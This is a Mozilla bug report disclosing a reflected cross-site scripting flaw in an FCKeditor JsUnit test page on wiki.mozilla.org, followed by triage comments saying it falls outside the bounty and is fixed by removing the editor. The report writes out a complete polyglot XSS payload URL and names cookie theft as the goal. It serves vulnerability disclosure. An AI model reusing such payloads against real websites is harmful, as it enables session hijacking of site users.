812769 - wiki.mozilla.org xss in URL JsUnit 2.2

Status: RESOLVED FIXED

(Websites :: wiki.mozilla.org, defect)

Description

[Sony]

Attachment: xss.jpg

User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Build ID: 20120306064154

Steps to reproduce:

Hello again,

i found ..hmm..interesting thing.  


Actual results:

Today i read about FCKeditor and try and try with https://wiki.mozilla.org/extensions/FCKeditor/fckeditor/editor/filemanager/connectors/uploadtest.html , but this impossible, because .."This file uploader is disabled." And i found something interesting another..and this work!)) 

https://wiki.mozilla.org/extensions/FCKeditor/fckeditor/_test/automated/_jsunit/testRunner.html?testpage=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

I use for test Mozilla Firefox browser. 

Yeah, this is a very interesting xss. Today i all day with xss, great day)) Like this. 


Expected results:

Steal cookies, etc.

Comment 1

[Sony]

I think a lot of web sites have a problem with this bug. I think this should be fixed and reported to the developers.

Comment 2

[Daniel Veditz [:dveditz]]

XSS on our wiki sites are not eligible for our bounty program. Since it's 3rd party software we are only interested in bugs that affect the machine integrity, not the wiki content.

Comment 3

[Andrei Hajdukewycz [:sancus]]

This is fixed because FCKeditor was removed in the wikimo upgrade per bug 738257.